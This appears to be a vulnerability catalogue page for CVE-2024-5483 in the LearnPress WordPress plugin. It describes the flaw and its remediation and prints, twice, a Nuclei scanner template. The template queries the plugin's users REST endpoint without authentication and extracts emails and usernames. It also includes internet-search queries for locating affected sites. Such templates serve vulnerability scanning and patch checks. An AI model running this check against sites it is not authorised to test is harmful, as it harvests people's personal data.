LearnPress < 4.2.6.8.1 - Information Disclosure

CVE-2024-5483

Verified

Description

LearnPress – WordPress LMS Plugin contains a sensitive information exposure caused by incorrect implementation of get_items_permissions_check function in all versions up to 4.2.6.8, letting unauthenticated attackers extract user emails and basic information.

Severity

Medium

CVSS Score

5.3

Exploit Probability

Affected Product

learnpress

Published Date

February 7, 2026

Template Author

pussycat0x

CVE-2024-5483.yaml

id: CVE-2024-5483

info:
  name: LearnPress < 4.2.6.8.1 - Information Disclosure
  author: pussycat0x
  severity: medium
  description: |
    LearnPress – WordPress LMS Plugin contains a sensitive information exposure caused by incorrect implementation of get_items_permissions_check function in all versions up to 4.2.6.8, letting unauthenticated attackers extract user emails and basic information.
  impact: |
    Unauthenticated attackers can access sensitive user information, including emails, leading to privacy breaches.
  remediation: Update to version 4.2.6.9 or later.
  reference:
    - https://wpscan.com/vulnerability/1f253156-333b-4be6-b727-06237567be1e/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-5483
    epss-score: 0.05516
    epss-percentile: 0.90337
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
    vendor: thimpress
    product: learnpress
    framework: wordpress
    publicwww-query: "/wp-content/plugins/learnpress/"
    fofa-query: body="/wp-content/plugins/learnpress/"
    shodan-query: http.html:"/wp-content/plugins/learnpress/"
  tags: cve,cve2024,wordpress,wpscan,wp-plugin,learnpress,vuln,info-leak

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/learnpress/v1/users"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "id","email","username","email")'
        condition: and

    extractors:
      - type: regex
        name: user_email
        part: body
        regex:
          - '"(?:email|user_email)"\s*:\s*"([^"@]+@[^"]+)"'
        group: 1
        internal: true

      - type: regex
        name: username
        part: body
        regex:
          - '"(?:username|user_login)"\s*:\s*"([^"]+)"'
        group: 1
        internal: true

      - type: dsl
        dsl:
          - "'Username: ' + username"
          - "'Email: ' + user_email"
# digest: 480a0045304302206e88cecd624401fc78c67696c9b7b0279efa4c96ddad579493a22255f6153eed021f46a23e58d06d63161cd8e9eee387409db6ec50d613d3a1f9c0dd692e256142:922c64590222798bb761d5b6d8e72950

5.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE ID:

cve-2024-5483

CWE ID:

cwe-200

References

https://wpscan.com/vulnerability/1f253156-333b-4be6-b727-06237567be1e/

Remediation Steps

Update to version 4.2.6.9 or later.

id: CVE-2024-5483

info:
  name: LearnPress < 4.2.6.8.1 - Information Disclosure
  author: pussycat0x
  severity: medium
  description: |
    LearnPress – WordPress LMS Plugin contains a sensitive information exposure caused by incorrect implementation of get_items_permissions_check function in all versions up to 4.2.6.8, letting unauthenticated attackers extract user emails and basic information.
  impact: |
    Unauthenticated attackers can access sensitive user information, including emails, leading to privacy breaches.
  remediation: Update to version 4.2.6.9 or later.
  reference:
    - https://wpscan.com/vulnerability/1f253156-333b-4be6-b727-06237567be1e/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-5483
    epss-score: 0.05516
    epss-percentile: 0.90337
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
    vendor: thimpress
    product: learnpress
    framework: wordpress
    publicwww-query: "/wp-content/plugins/learnpress/"
    fofa-query: body="/wp-content/plugins/learnpress/"
    shodan-query: http.html:"/wp-content/plugins/learnpress/"
  tags: cve,cve2024,wordpress,wpscan,wp-plugin,learnpress,vuln,info-leak

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/learnpress/v1/users"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "id","email","username","email")'
        condition: and

    extractors:
      - type: regex
        name: user_email
        part: body
        regex:
          - '"(?:email|user_email)"\s*:\s*"([^"@]+@[^"]+)"'
        group: 1
        internal: true

      - type: regex
        name: username
        part: body
        regex:
          - '"(?:username|user_login)"\s*:\s*"([^"]+)"'
        group: 1
        internal: true

      - type: dsl
        dsl:
          - "'Username: ' + username"
          - "'Email: ' + user_email"
# digest: 480a0045304302206e88cecd624401fc78c67696c9b7b0279efa4c96ddad579493a22255f6153eed021f46a23e58d06d63161cd8e9eee387409db6ec50d613d3a1f9c0dd692e256142:922c64590222798bb761d5b6d8e72950

LearnPress < 4.2.6.8.1 - Information Disclosure

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

LearnPress < 4.2.6.8.1 - Information Disclosure

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps